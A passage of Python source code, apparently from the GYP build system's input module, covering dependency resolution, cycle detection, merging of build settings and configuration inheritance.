if key == "variables" or type(value) is str:
continue
if type(value) is dict:
# Pass a copy of the variables dict so that subdicts can't influence
# parents.
ProcessVariablesAndConditionsInDict(
value, phase, variables, build_file, key
)
elif type(value) is list:
# The list itself can't influence the variables dict, and
# ProcessVariablesAndConditionsInList will make copies of the variables
# dict if it needs to pass it to something that can influence it. No
# copy is necessary here.
ProcessVariablesAndConditionsInList(value, phase, variables, build_file)
elif type(value) is not int:
raise TypeError("Unknown type " + value.__class__.__name__ + " for " + key)
def ProcessVariablesAndConditionsInList(the_list, phase, variables, build_file):
# Iterate using an index so that new values can be assigned into the_list.
index = 0
while index < len(the_list):
item = the_list[index]
if type(item) is dict:
# Make a copy of the variables dict so that it won't influence anything
# outside of its own scope.
ProcessVariablesAndConditionsInDict(item, phase, variables, build_file)
elif type(item) is list:
ProcessVariablesAndConditionsInList(item, phase, variables, build_file)
elif type(item) is str:
expanded = ExpandVariables(item, phase, variables, build_file)
if type(expanded) in (str, int):
the_list[index] = expanded
elif type(expanded) is list:
the_list[index : index + 1] = expanded
index += len(expanded)
# index now identifies the next item to examine. Continue right now
# without falling into the index increment below.
continue
else:
raise ValueError(
"Variable expansion in this context permits strings and "
+ "lists only, found "
+ expanded.__class__.__name__
+ " at "
+ str(index)
)
elif type(item) is not int:
raise TypeError(
"Unknown type " + item.__class__.__name__ + " at index " + index
)
index = index + 1
def BuildTargetsDict(data):
"""Builds a dict mapping fully-qualified target names to their target dicts.
|data| is a dict mapping loaded build files by pathname relative to the
current directory. Values in |data| are build file contents. For each
|data| value with a "targets" key, the value of the "targets" key is taken
as a list containing target dicts. Each target's fully-qualified name is
constructed from the pathname of the build file (|data| key) and its
"target_name" property. These fully-qualified names are used as the keys
in the returned dict. These keys provide access to the target dicts,
the dicts in the "targets" lists.
"""
targets = {}
for build_file in data["target_build_files"]:
for target in data[build_file].get("targets", []):
target_name = gyp.common.QualifiedTarget(
build_file, target["target_name"], target["toolset"]
)
if target_name in targets:
raise GypError("Duplicate target definitions for " + target_name)
targets[target_name] = target
return targets
def QualifyDependencies(targets):
"""Make dependency links fully-qualified relative to the current directory.
|targets| is a dict mapping fully-qualified target names to their target
dicts. For each target in this dict, keys known to contain dependency
links are examined, and any dependencies referenced will be rewritten
so that they are fully-qualified and relative to the current directory.
All rewritten dependencies are suitable for use as keys to |targets| or a
similar dict.
"""
all_dependency_sections = [
dep + op for dep in dependency_sections for op in ("", "!", "/")
]
for target, target_dict in targets.items():
target_build_file = gyp.common.BuildFile(target)
toolset = target_dict["toolset"]
for dependency_key in all_dependency_sections:
dependencies = target_dict.get(dependency_key, [])
for index, dep in enumerate(dependencies):
dep_file, dep_target, dep_toolset = gyp.common.ResolveTarget(
target_build_file, dep, toolset
)
if not multiple_toolsets:
# Ignore toolset specification in the dependency if it is specified.
dep_toolset = toolset
dependency = gyp.common.QualifiedTarget(
dep_file, dep_target, dep_toolset
)
dependencies[index] = dependency
# Make sure anything appearing in a list other than "dependencies" also
# appears in the "dependencies" list.
if (
dependency_key != "dependencies"
and dependency not in target_dict["dependencies"]
):
raise GypError(
"Found "
+ dependency
+ " in "
+ dependency_key
+ " of "
+ target
+ ", but not in dependencies"
)
def ExpandWildcardDependencies(targets, data):
"""Expands dependencies specified as build_file:*.
For each target in |targets|, examines sections containing links to other
targets. If any such section contains a link of the form build_file:*, it
is taken as a wildcard link, and is expanded to list each target in
build_file. The |data| dict provides access to build file dicts.
Any target that does not wish to be included by wildcard can provide an
optional "suppress_wildcard" key in its target dict. When present and
true, a wildcard dependency link will not include such targets.
All dependency names, including the keys to |targets| and the values in each
dependency list, must be qualified when this function is called.
"""
for target, target_dict in targets.items():
target_build_file = gyp.common.BuildFile(target)
for dependency_key in dependency_sections:
dependencies = target_dict.get(dependency_key, [])
# Loop this way instead of "for dependency in" or "for index in range"
# because the dependencies list will be modified within the loop body.
index = 0
while index < len(dependencies):
(
dependency_build_file,
dependency_target,
dependency_toolset,
) = gyp.common.ParseQualifiedTarget(dependencies[index])
if dependency_target != "*" and dependency_toolset != "*":
# Not a wildcard. Keep it moving.
index = index + 1
continue
if dependency_build_file == target_build_file:
# It's an error for a target to depend on all other targets in
# the same file, because a target cannot depend on itself.
raise GypError(
"Found wildcard in "
+ dependency_key
+ " of "
+ target
+ " referring to same build file"
)
# Take the wildcard out and adjust the index so that the next
# dependency in the list will be processed the next time through the
# loop.
del dependencies[index]
index = index - 1
# Loop through the targets in the other build file, adding them to
# this target's list of dependencies in place of the removed
# wildcard.
dependency_target_dicts = data[dependency_build_file]["targets"]
for dependency_target_dict in dependency_target_dicts:
if int(dependency_target_dict.get("suppress_wildcard", False)):
continue
dependency_target_name = dependency_target_dict["target_name"]
if (
dependency_target != "*"
and dependency_target != dependency_target_name
):
continue
dependency_target_toolset = dependency_target_dict["toolset"]
if (
dependency_toolset != "*"
and dependency_toolset != dependency_target_toolset
):
continue
dependency = gyp.common.QualifiedTarget(
dependency_build_file,
dependency_target_name,
dependency_target_toolset,
)
index = index + 1
dependencies.insert(index, dependency)
index = index + 1
def Unify(l):
"""Removes duplicate elements from l, keeping the first element."""
seen = {}
return [seen.setdefault(e, e) for e in l if e not in seen]
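# Illustrative doctest (added):
# >>> Unify([1, 2, 1, 3, 2])
# [1, 2, 3]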
def RemoveDuplicateDependencies(targets):
"""Makes sure every dependency appears only once in all targets's dependency
lists."""
for target_name, target_dict in targets.items():
for dependency_key in dependency_sections:
dependencies = target_dict.get(dependency_key, [])
if dependencies:
target_dict[dependency_key] = Unify(dependencies)
def Filter(l, item):
"""Removes item from l."""
res = {}
return [res.setdefault(e, e) for e in l if e != item]
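# Illustrative doctest (added):
# >>> Filter(['a', 'b', 'a'], 'a')
# ['b']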
def RemoveSelfDependencies(targets):
"""Remove self dependencies from targets that have the prune_self_dependency
variable set."""
for target_name, target_dict in targets.items():
for dependency_key in dependency_sections:
dependencies = target_dict.get(dependency_key, [])
if dependencies:
for t in dependencies:
if t == target_name:
if (
targets[t]
.get("variables", {})
.get("prune_self_dependency", 0)
):
target_dict[dependency_key] = Filter(
dependencies, target_name
)
def RemoveLinkDependenciesFromNoneTargets(targets):
"""Remove dependencies having the 'link_dependency' attribute from the 'none'
targets."""
for target_name, target_dict in targets.items():
for dependency_key in dependency_sections:
dependencies = target_dict.get(dependency_key, [])
if dependencies:
for t in dependencies:
if target_dict.get("type", None) == "none":
if targets[t].get("variables", {}).get("link_dependency", 0):
target_dict[dependency_key] = Filter(
target_dict[dependency_key], t
)
class DependencyGraphNode(object):
"""
Attributes:
ref: A reference to an object that this DependencyGraphNode represents.
dependencies: List of DependencyGraphNodes on which this one depends.
dependents: List of DependencyGraphNodes that depend on this one.
"""
class CircularException(GypError):
pass
def __init__(self, ref):
self.ref = ref
self.dependencies = []
self.dependents = []
def __repr__(self):
return "<DependencyGraphNode: %r>" % self.ref
def FlattenToList(self):
# flat_list is the sorted list of dependencies - actually, the list items
# are the "ref" attributes of DependencyGraphNodes. Every target will
# appear in flat_list after all of its dependencies, and before all of its
# dependents.
flat_list = OrderedSet()
def ExtractNodeRef(node):
"""Extracts the object that the node represents from the given node."""
return node.ref
# in_degree_zeros is the list of DependencyGraphNodes that have no
# dependencies not in flat_list. Initially, it is a copy of the children
# of this node, because when the graph was built, nodes with no
# dependencies were made implicit dependents of the root node.
in_degree_zeros = sorted(self.dependents[:], key=ExtractNodeRef)
while in_degree_zeros:
# Nodes in in_degree_zeros have no dependencies not in flat_list, so they
# can be appended to flat_list. Take these nodes out of in_degree_zeros
# as work progresses, so that the next node to process from the list can
# always be accessed at a consistent position.
node = in_degree_zeros.pop()
flat_list.add(node.ref)
# Look at dependents of the node just added to flat_list. Some of them
# may now belong in in_degree_zeros.
for node_dependent in sorted(node.dependents, key=ExtractNodeRef):
is_in_degree_zero = True
# TODO: We want to check through the
# node_dependent.dependencies list but if it's long and we
# always start at the beginning, then we get O(n^2) behaviour.
for node_dependent_dependency in sorted(
node_dependent.dependencies, key=ExtractNodeRef
):
if node_dependent_dependency.ref not in flat_list:
# The dependent has one or more dependencies not in flat_list. There
# will be more chances to add it to flat_list when examining
# it again as a dependent of those other dependencies, provided
# that there are no cycles.
is_in_degree_zero = False
break
if is_in_degree_zero:
# All of the dependent's dependencies are already in flat_list. Add
# it to in_degree_zeros where it will be processed in a future
# iteration of the outer loop.
in_degree_zeros += [node_dependent]
return list(flat_list)
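# Illustrative sketch (added; a toy two-node graph, hand-wired so that 'a'
# has no real dependencies, 'b' depends on 'a', and the implicit root lists
# the dependency-free node as its dependent):
# >>> root = DependencyGraphNode(None)
# >>> a, b = DependencyGraphNode('a'), DependencyGraphNode('b')
# >>> root.dependents = [a]; a.dependencies = [root]
# >>> a.dependents = [b]; b.dependencies = [a]
# >>> root.FlattenToList()
# ['a', 'b']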
def FindCycles(self):
"""
Returns a list of cycles in the graph, where each cycle is its own list.
"""
results = []
visited = set()
def Visit(node, path):
for child in node.dependents:
if child in path:
results.append([child] + path[: path.index(child) + 1])
elif child not in visited:
visited.add(child)
Visit(child, [child] + path)
visited.add(self)
Visit(self, [self])
return results
def DirectDependencies(self, dependencies=None):
"""Returns a list of just direct dependencies."""
if dependencies is None:
dependencies = []
for dependency in self.dependencies:
# Check for None, corresponding to the root node.
if dependency.ref and dependency.ref not in dependencies:
dependencies.append(dependency.ref)
return dependencies
def _AddImportedDependencies(self, targets, dependencies=None):
"""Given a list of direct dependencies, adds indirect dependencies that
other dependencies have declared to export their settings.
This method does not operate on self. Rather, it operates on the list
of dependencies in the |dependencies| argument. For each dependency in
that list, if any declares that it exports the settings of one of its
own dependencies, those dependencies whose settings are "passed through"
are added to the list. As new items are added to the list, they too will
be processed, so it is possible to import settings through multiple levels
of dependencies.
This method is not terribly useful on its own; it depends on being
"primed" with a list of direct dependencies such as one provided by
DirectDependencies. DirectAndImportedDependencies is intended to be the
public entry point.
"""
if dependencies is None:
dependencies = []
index = 0
while index < len(dependencies):
dependency = dependencies[index]
dependency_dict = targets[dependency]
# Add any dependencies whose settings should be imported to the list
# if not already present. Newly-added items will be checked for
# their own imports when the list iteration reaches them.
# Rather than simply appending new items, insert them after the
# dependency that exported them. This is done to more closely match
# the depth-first method used by DeepDependencies.
add_index = 1
for imported_dependency in dependency_dict.get(
"export_dependent_settings", []
):
if imported_dependency not in dependencies:
dependencies.insert(index + add_index, imported_dependency)
add_index = add_index + 1
index = index + 1
return dependencies
def DirectAndImportedDependencies(self, targets, dependencies=None):
"""Returns a list of a target's direct dependencies and all indirect
dependencies that a dependency has advertised settings should be exported
through the dependency for.
"""
dependencies = self.DirectDependencies(dependencies)
return self._AddImportedDependencies(targets, dependencies)
def DeepDependencies(self, dependencies=None):
"""Returns an OrderedSet of all of a target's dependencies, recursively."""
if dependencies is None:
# Using a list to get ordered output and a set to do fast "is it
# already added" checks.
dependencies = OrderedSet()
for dependency in self.dependencies:
# Check for None, corresponding to the root node.
if dependency.ref is None:
continue
if dependency.ref not in dependencies:
dependency.DeepDependencies(dependencies)
dependencies.add(dependency.ref)
return dependencies
def _LinkDependenciesInternal(
self, targets, include_shared_libraries, dependencies=None, initial=True
):
"""Returns an OrderedSet of dependency targets that are linked
into this target.
This function has a split personality, depending on the setting of
|initial|. Outside callers should always leave |initial| at its default
setting.
When adding a target to the list of dependencies, this function will
recurse into itself with |initial| set to False, to collect dependencies
that are linked into the linkable target for which the list is being built.
If |include_shared_libraries| is False, the resulting dependencies will not
include shared_library targets that are linked into this target.
"""
if dependencies is None:
# Using a list to get ordered output and a set to do fast "is it
# already added" checks.
dependencies = OrderedSet()
# Check for None, corresponding to the root node.
if self.ref is None:
return dependencies
# It's unfortunate that |targets| has to be passed into this function,
# but that's presently the easiest way to access the target dicts so that
# this function can find target types.
if "target_name" not in targets[self.ref]:
raise GypError("Missing 'target_name' field in target.")
if "type" not in targets[self.ref]:
raise GypError(
"Missing 'type' field in target %s" % targets[self.ref]["target_name"]
)
target_type = targets[self.ref]["type"]
is_linkable = target_type in linkable_types
if initial and not is_linkable:
# If this is the first target being examined and it's not linkable,
# return an empty list of link dependencies, because the link
# dependencies are intended to apply to the target itself (initial is
# True) and this target won't be linked.
return dependencies
# Don't traverse 'none' targets if explicitly excluded.
if target_type == "none" and not targets[self.ref].get(
"dependencies_traverse", True
):
dependencies.add(self.ref)
return dependencies
# Executables, mac kernel extensions, windows drivers and loadable modules
# are already fully and finally linked. Nothing else can be a link
# dependency of them, there can only be dependencies in the sense that a
# dependent target might run an executable or load the loadable_module.
if not initial and target_type in (
"executable",
"loadable_module",
"mac_kernel_extension",
"windows_driver",
):
return dependencies
# Shared libraries are already fully linked. They should only be included
# in |dependencies| when adjusting static library dependencies (in order to
# link against the shared_library's import lib), but should not be included
# in |dependencies| when propagating link_settings.
# The |include_shared_libraries| flag controls which of these two cases we
# are handling.
if (
not initial
and target_type == "shared_library"
and not include_shared_libraries
):
return dependencies
# The target is linkable, add it to the list of link dependencies.
if self.ref not in dependencies:
dependencies.add(self.ref)
if initial or not is_linkable:
# If this is a subsequent target and it's linkable, don't look any
# further for linkable dependencies, as they'll already be linked into
# this linkable target. Always look at dependencies of the initial
# target, and always look at dependencies of non-linkables.
for dependency in self.dependencies:
dependency._LinkDependenciesInternal(
targets, include_shared_libraries, dependencies, False
)
return dependencies
def DependenciesForLinkSettings(self, targets):
"""
Returns a list of dependency targets whose link_settings should be merged
into this target.
"""
# TODO(sbaig) Currently, chrome depends on the bug that shared libraries'
# link_settings are propagated. So for now, we will allow it, unless the
# 'allow_sharedlib_linksettings_propagation' flag is explicitly set to
# False. Once chrome is fixed, we can remove this flag.
include_shared_libraries = targets[self.ref].get(
"allow_sharedlib_linksettings_propagation", True
)
return self._LinkDependenciesInternal(targets, include_shared_libraries)
def DependenciesToLinkAgainst(self, targets):
"""
Returns a list of dependency targets that are linked into this target.
"""
return self._LinkDependenciesInternal(targets, True)
def BuildDependencyList(targets):
# Create a DependencyGraphNode for each target. Put it into a dict for easy
# access.
dependency_nodes = {}
for target, spec in targets.items():
if target not in dependency_nodes:
dependency_nodes[target] = DependencyGraphNode(target)
# Set up the dependency links. Targets that have no dependencies are treated
# as dependent on root_node.
root_node = DependencyGraphNode(None)
for target, spec in targets.items():
target_node = dependency_nodes[target]
dependencies = spec.get("dependencies")
if not dependencies:
target_node.dependencies = [root_node]
root_node.dependents.append(target_node)
else:
for dependency in dependencies:
dependency_node = dependency_nodes.get(dependency)
if not dependency_node:
raise GypError(
"Dependency '%s' not found while "
"trying to load target %s" % (dependency, target)
)
target_node.dependencies.append(dependency_node)
dependency_node.dependents.append(target_node)
flat_list = root_node.FlattenToList()
# If there's anything left unvisited, there must be a circular dependency
# (cycle).
if len(flat_list) != len(targets):
if not root_node.dependents:
# If all targets have dependencies, add the first target as a dependent
# of root_node so that the cycle can be discovered from root_node.
target = next(iter(targets))
target_node = dependency_nodes[target]
target_node.dependencies.append(root_node)
root_node.dependents.append(target_node)
cycles = []
for cycle in root_node.FindCycles():
paths = [node.ref for node in cycle]
cycles.append("Cycle: %s" % " -> ".join(paths))
raise DependencyGraphNode.CircularException(
"Cycles in dependency graph detected:\n" + "\n".join(cycles)
)
return [dependency_nodes, flat_list]
def VerifyNoGYPFileCircularDependencies(targets):
# Create a DependencyGraphNode for each gyp file containing a target. Put
# it into a dict for easy access.
dependency_nodes = {}
for target in targets:
build_file = gyp.common.BuildFile(target)
if build_file not in dependency_nodes:
dependency_nodes[build_file] = DependencyGraphNode(build_file)
# Set up the dependency links.
for target, spec in targets.items():
build_file = gyp.common.BuildFile(target)
build_file_node = dependency_nodes[build_file]
target_dependencies = spec.get("dependencies", [])
for dependency in target_dependencies:
try:
dependency_build_file = gyp.common.BuildFile(dependency)
except GypError as e:
gyp.common.ExceptionAppend(
e, "while computing dependencies of .gyp file %s" % build_file
)
raise
if dependency_build_file == build_file:
# A .gyp file is allowed to refer back to itself.
continue
dependency_node = dependency_nodes.get(dependency_build_file)
if not dependency_node:
raise GypError("Dependency '%s' not found" % dependency_build_file)
if dependency_node not in build_file_node.dependencies:
build_file_node.dependencies.append(dependency_node)
dependency_node.dependents.append(build_file_node)
# Files that have no dependencies are treated as dependent on root_node.
root_node = DependencyGraphNode(None)
for build_file_node in dependency_nodes.values():
if len(build_file_node.dependencies) == 0:
build_file_node.dependencies.append(root_node)
root_node.dependents.append(build_file_node)
flat_list = root_node.FlattenToList()
# If there's anything left unvisited, there must be a circular dependency
# (cycle).
if len(flat_list) != len(dependency_nodes):
if not root_node.dependents:
# If all files have dependencies, add the first file as a dependent
# of root_node so that the cycle can be discovered from root_node.
file_node = next(iter(dependency_nodes.values()))
file_node.dependencies.append(root_node)
root_node.dependents.append(file_node)
cycles = []
for cycle in root_node.FindCycles():
paths = [node.ref for node in cycle]
cycles.append("Cycle: %s" % " -> ".join(paths))
raise DependencyGraphNode.CircularException(
"Cycles in .gyp file dependency graph detected:\n" + "\n".join(cycles)
)
def DoDependentSettings(key, flat_list, targets, dependency_nodes):
# key should be one of all_dependent_settings, direct_dependent_settings,
# or link_settings.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
if key == "all_dependent_settings":
dependencies = dependency_nodes[target].DeepDependencies()
elif key == "direct_dependent_settings":
dependencies = dependency_nodes[target].DirectAndImportedDependencies(
targets
)
elif key == "link_settings":
dependencies = dependency_nodes[target].DependenciesForLinkSettings(targets)
else:
raise GypError(
"DoDependentSettings doesn't know how to determine "
"dependencies for " + key
)
for dependency in dependencies:
dependency_dict = targets[dependency]
if key not in dependency_dict:
continue
dependency_build_file = gyp.common.BuildFile(dependency)
MergeDicts(
target_dict, dependency_dict[key], build_file, dependency_build_file
)
def AdjustStaticLibraryDependencies(
flat_list, targets, dependency_nodes, sort_dependencies
):
# Recompute target "dependencies" properties. For each static library
# target, remove "dependencies" entries referring to other static libraries,
# unless the dependency has the "hard_dependency" attribute set. For each
# linkable target, add a "dependencies" entry referring to all of the
# target's computed list of link dependencies (including static libraries)
# if no such entry is already present.
for target in flat_list:
target_dict = targets[target]
target_type = target_dict["type"]
if target_type == "static_library":
if "dependencies" not in target_dict:
continue
target_dict["dependencies_original"] = target_dict.get("dependencies", [])[
:
]
# A static library should not depend on another static library unless
# the dependency relationship is "hard," which should only be done when
# a dependent relies on some side effect other than just the build
# product, like a rule or action output. Further, if a target has a
# non-hard dependency, but that dependency exports a hard dependency,
# the non-hard dependency can safely be removed, but the exported hard
# dependency must be added to the target to keep the same dependency
# ordering.
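# Illustrative example (hypothetical targets): if static library A has a
# non-hard dependency on static library B, B is dropped from A's
# "dependencies" here; the executable that links A picks B up instead via
# the linkable-target branch below.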
dependencies = dependency_nodes[target].DirectAndImportedDependencies(
targets
)
index = 0
while index < len(dependencies):
dependency = dependencies[index]
dependency_dict = targets[dependency]
# Remove every non-hard static library dependency and remove every
# non-static library dependency that isn't a direct dependency.
if (
dependency_dict["type"] == "static_library"
and not dependency_dict.get("hard_dependency", False)
) or (
dependency_dict["type"] != "static_library"
and dependency not in target_dict["dependencies"]
):
# Take the dependency out of the list, and don't increment index
# because the next dependency to analyze will shift into the index
# formerly occupied by the one being removed.
del dependencies[index]
else:
index = index + 1
# Update the dependencies. If the dependencies list is empty, it's not
# needed, so unhook it.
if len(dependencies) > 0:
target_dict["dependencies"] = dependencies
else:
del target_dict["dependencies"]
elif target_type in linkable_types:
# Get a list of dependency targets that should be linked into this
# target. Add them to the dependencies list if they're not already
# present.
link_dependencies = dependency_nodes[target].DependenciesToLinkAgainst(
targets
)
for dependency in link_dependencies:
if dependency == target:
continue
if "dependencies" not in target_dict:
target_dict["dependencies"] = []
if dependency not in target_dict["dependencies"]:
target_dict["dependencies"].append(dependency)
# Sort the dependencies list in the order from dependents to dependencies.
# e.g. If A and B depend on C and C depends on D, sort them in A, B, C, D.
# Note: flat_list is already sorted in the order from dependencies to
# dependents.
if sort_dependencies and "dependencies" in target_dict:
target_dict["dependencies"] = [
dep
for dep in reversed(flat_list)
if dep in target_dict["dependencies"]
]
# Initialize this here to speed up MakePathRelative.
exception_re = re.compile(r"""["']?[-/$<>^]""")
def MakePathRelative(to_file, fro_file, item):
# If item is a relative path, it's relative to the build file dict that it's
# coming from. Fix it up to make it relative to the build file dict that
# it's going into.
# Exception: any |item| that begins with these special characters is
# returned without modification.
# / Used when a path is already absolute (shortcut optimization;
# such paths would be returned as absolute anyway)
# $ Used for build environment variables
# - Used for some build environment flags (such as -lapr-1 in a
# "libraries" section)
# < Used for our own variable and command expansions (see ExpandVariables)
# > Used for our own variable and command expansions (see ExpandVariables)
# ^ Used for our own variable and command expansions (see ExpandVariables)
#
# "/' Used when a value is quoted. If these are present, then we
# check the second character instead.
#
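# Illustrative example (hypothetical paths): an item "foo/bar.c" coming from
# "src/a.gyp" and merged into "out/b.gyp" is rewritten to "../src/foo/bar.c"
# so that it still refers to the same file on disk.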
if to_file == fro_file or exception_re.match(item):
return item
else:
# TODO(dglazkov) The backslash/forward-slash replacement at the end is a
# temporary measure. This should really be addressed by keeping all paths
# in POSIX until actual project generation.
ret = os.path.normpath(
os.path.join(
gyp.common.RelativePath(
os.path.dirname(fro_file), os.path.dirname(to_file)
),
item,
)
).replace("\\", "/")
if item.endswith("/"):
ret += "/"
return ret
def MergeLists(to, fro, to_file, fro_file, is_paths=False, append=True):
# The Python documentation recommends that objects which do not support
# hashing set __hash__ to None. Python library objects follow this rule.
def is_hashable(val):
return val.__hash__
# If x is hashable, returns whether x is in s. Else returns whether x is in l.
def is_in_set_or_list(x, s, l):
if is_hashable(x):
return x in s
return x in l
prepend_index = 0
# Make membership testing of hashables in |to| (in particular, strings)
# faster.
hashable_to_set = set(x for x in to if is_hashable(x))
for item in fro:
singleton = False
if type(item) in (str, int):
# The cheap and easy case.
if is_paths:
to_item = MakePathRelative(to_file, fro_file, item)
else:
to_item = item
if not (type(item) is str and item.startswith("-")):
# Any string that doesn't begin with a "-" is a singleton - it can
# only appear once in a list, to be enforced by the list merge append
# or prepend.
singleton = True
elif type(item) is dict:
# Make a copy of the dictionary, continuing to look for paths to fix.
# The other intelligent aspects of merge processing won't apply because
# item is being merged into an empty dict.
to_item = {}
MergeDicts(to_item, item, to_file, fro_file)
elif type(item) is list:
# Recurse, making a copy of the list. If the list contains any
# descendant dicts, path fixing will occur. Note that here, custom
# values for is_paths and append are dropped; those are only to be
# applied to |to| and |fro|, not sublists of |fro|. append shouldn't
# matter anyway because the new |to_item| list is empty.
to_item = []
MergeLists(to_item, item, to_file, fro_file)
else:
raise TypeError(
"Attempt to merge list item of unsupported type "
+ item.__class__.__name__
)
if append:
# If appending a singleton that's already in the list, don't append.
# This ensures that the earliest occurrence of the item will stay put.
if not singleton or not is_in_set_or_list(to_item, hashable_to_set, to):
to.append(to_item)
if is_hashable(to_item):
hashable_to_set.add(to_item)
else:
# If prepending a singleton that's already in the list, remove the
# existing instance and proceed with the prepend. This ensures that the
# item appears at the earliest possible position in the list.
while singleton and to_item in to:
to.remove(to_item)
# Don't just insert everything at index 0. That would prepend the new
# items to the list in reverse order, which would be an unwelcome
# surprise.
to.insert(prepend_index, to_item)
if is_hashable(to_item):
hashable_to_set.add(to_item)
prepend_index = prepend_index + 1
def MergeDicts(to, fro, to_file, fro_file):
# I wanted to name the parameter "from" but it's a Python keyword...
for k, v in fro.items():
# It would be nice to do "if not k in to: to[k] = v" but that wouldn't give
# copy semantics. Something else may want to merge from the |fro| dict
# later, and having the same dict ref pointed to twice in the tree isn't
# what anyone wants considering that the dicts may subsequently be
# modified.
if k in to:
bad_merge = False
if type(v) in (str, int):
if type(to[k]) not in (str, int):
bad_merge = True
elif not isinstance(v, type(to[k])):
bad_merge = True
if bad_merge:
raise TypeError(
"Attempt to merge dict value of type "
+ v.__class__.__name__
+ " into incompatible type "
+ to[k].__class__.__name__
+ " for key "
+ k
)
if type(v) in (str, int):
# Overwrite the existing value, if any. Cheap and easy.
is_path = IsPathSection(k)
if is_path:
to[k] = MakePathRelative(to_file, fro_file, v)
else:
to[k] = v
elif type(v) is dict:
# Recurse, guaranteeing copies will be made of objects that require it.
if k not in to:
to[k] = {}
MergeDicts(to[k], v, to_file, fro_file)
elif type(v) is list:
# Lists in dicts can be merged with different policies, depending on
# how the key in the "from" dict (k, the from-key) is written.
#
# If the from-key has ...the to-list will have this action
# this character appended:... applied when receiving the from-list:
# = replace
# + prepend
# ? set, only if to-list does not yet exist
# (none) append
#
# This logic is list-specific, but since it relies on the associated
# dict key, it's checked in this dict-oriented function.
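# Illustrative example (hypothetical values): merging {'defines+': ['B']}
# into a dict holding {'defines': ['A']} yields ['B', 'A'] (prepend);
# {'defines': ['B']} yields ['A', 'B'] (append); {'defines=': ['B']} yields
# ['B'] (replace); {'defines?': ['B']} leaves ['A'] untouched.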
ext = k[-1]
append = True
if ext == "=":
list_base = k[:-1]
lists_incompatible = [list_base, list_base + "?"]
to[list_base] = []
elif ext == "+":
list_base = k[:-1]
lists_incompatible = [list_base + "=", list_base + "?"]
append = False
elif ext == "?":
list_base = k[:-1]
lists_incompatible = [list_base, list_base + "=", list_base + "+"]
else:
list_base = k
lists_incompatible = [list_base + "=", list_base + "?"]
# Some combinations of merge policies appearing together are meaningless.
# Replacing and appending simultaneously makes no sense, for example. Append
# and prepend are the only policies that can coexist.
for list_incompatible in lists_incompatible:
if list_incompatible in fro:
raise GypError(
"Incompatible list policies " + k + " and " + list_incompatible
)
if list_base in to:
if ext == "?":
# If the key ends in "?", the list will only be merged if it doesn't
# already exist.
continue
elif type(to[list_base]) is not list:
# This may not have been checked above if merging in a list with an
# extension character.
raise TypeError(
"Attempt to merge dict value of type "
+ v.__class__.__name__
+ " into incompatible type "
+ to[list_base].__class__.__name__
+ " for key "
+ list_base
+ "("
+ k
+ ")"
)
else:
to[list_base] = []
# Call MergeLists, which will make copies of objects that require it.
# MergeLists can recurse back into MergeDicts, although this will be
# to make copies of dicts (with paths fixed), there will be no
# subsequent dict "merging" once entering a list because lists are
# always replaced, appended to, or prepended to.
is_paths = IsPathSection(list_base)
MergeLists(to[list_base], v, to_file, fro_file, is_paths, append)
else:
raise TypeError(
"Attempt to merge dict value of unsupported type "
+ v.__class__.__name__
+ " for key "
+ k
)
def MergeConfigWithInheritance(
new_configuration_dict, build_file, target_dict, configuration, visited
):
# Skip if previously visited.
if configuration in visited:
return
# Look at this configuration.
configuration_dict = target_dict["configurations"][configuration]
# Merge in parents.
for parent in configuration_dict.get("inherit_from", []):
MergeConfigWithInheritance(
new_configuration_dict,
build_file,
target_dict,
parent,
visited + [configuration],
)
# Merge it into the new config.
MergeDicts(new_configuration_dict, configuration_dict, build_file, build_file)
# Drop abstract.
if "abstract" in new_configuration_dict:
del new_configuration_dict["abstract"]
def SetUpConfigurations(target, target_dict):
# key_suffixes is a list of key suffixes that might appear on key names.
# These suffixes are handled in conditional evaluations (for =, +, and ?)
# and rules/exclude processing (for ! and /). Keys with these suffixes
# should be treated the same as keys without.
key_suffixes = ["=", "+", "?", "!", "/"]
build_file = gyp.common.BuildFile(target)
# Provide a single configuration by default if none exists.
# TODO(mark): Signal an error if default_configurations exists but
# configurations does not.
if "configurations" not in target_dict:
target_dict["configurations"] = {"Default": {}}
if "default_configuration" not in target_dict:
concrete = [
i
for (i, config) in target_dict["configurations"].items()
if not config.get("abstract")
]
target_dict["default_configuration"] = sorted(concrete)[0]
merged_configurations = {}
configs = target_dict["configurations"]
for (configuration, old_configuration_dict) in configs.items():
# Skip abstract configurations (saves work only).
if old_configuration_dict.get("abstract"):
continue
# Configurations inherit (most) settings from the enclosing target scope.
# Get the inheritance relationship right by making a copy of the target
# dict.
new_configuration_dict = {}
for (key, target_val) in target_dict.items():
key_ext = key[-1:]
if key_ext in key_suffixes:
key_base = key[:-1]
else:
key_base = key
if key_base not in non_configuration_keys:
new_configuration_dict[key] = gyp.simple_copy.deepcopy(target_val)
# Merge in configuration (with all its parents first).
MergeConfigWithInheritance(
new_configuration_dict, build_file, target_dict, configuration, []
)
merged_configurations[configuration] = new_configuration_dict
# Put the new configurations back into the target dict as a configuration.
for configuration in merged_configurations.keys():
target_dict["configurations"][configuration] = merged_configurations[
configuration
]
# Now drop all the abstract ones.
configs = target_dict["configurations"]
target_dict["configurations"] = {
k: v for k, v in configs.items() if not v.get("abstract")
}
# Now that all of the target's configurations have been built, go through
# the target dict's keys and remove everything that's been moved into a
# "configurations" section.
delete_keys = []
for key in target_dict:
key_ext = key[-1:]
if key_ext in key_suffixes:
key_base = key[:-1]
else:
key_base = key
if key_base not in non_configuration_keys:
delete_keys.append(key)
for key in delete_keys:
del target_dict[key]
# Check the configurations to see if they contain invalid keys.
for configuration in target_dict["configurations"].keys():
configuration_dict = target_dict["configurations"][configuration]
for key in configuration_dict.keys():
if key in invalid_configuration_keys:
raise GypError(
"%s not allowed in the %s configuration, found in "
"target %s" % (key, configuration, target)
)
def ProcessListFiltersInDict(name, the_dict):
"""Process regular expression and exclusion-based filters on lists.
An exclusion list is in a dict key named with a trailing "!", like
"sources!". Every item in such a list is removed from the associated
main list, which in this example would be "sources". Removed items are
placed into a "sources_excluded" list in the dict.
Regular expression (regex) filters are contained in dict keys named with a
trailing "/", such as "sources/" to operate on the "sources" list. Regex
filters in a dict take the form:
'sources/': [ ['exclude', '_(linux|mac|win)\\.cc$'],
['include', '_mac\\.cc$'] ],
The first filter says to exclude all files ending in _linux.cc, _mac.cc, and
_win.cc. The second filter then includes all files ending in _mac.cc that
are now or were once in the "sources" list. Items matching an "exclude"
filter are subject to the same processing as would occur if they were listed
by name in an exclusion list (ending in "!"). Items matching an "include"
filter are brought back into the main list if previously excluded by an
exclusion list or exclusion regex filter. Subsequent matching "exclude"
patterns can still cause items to be excluded after matching an "include".
"""
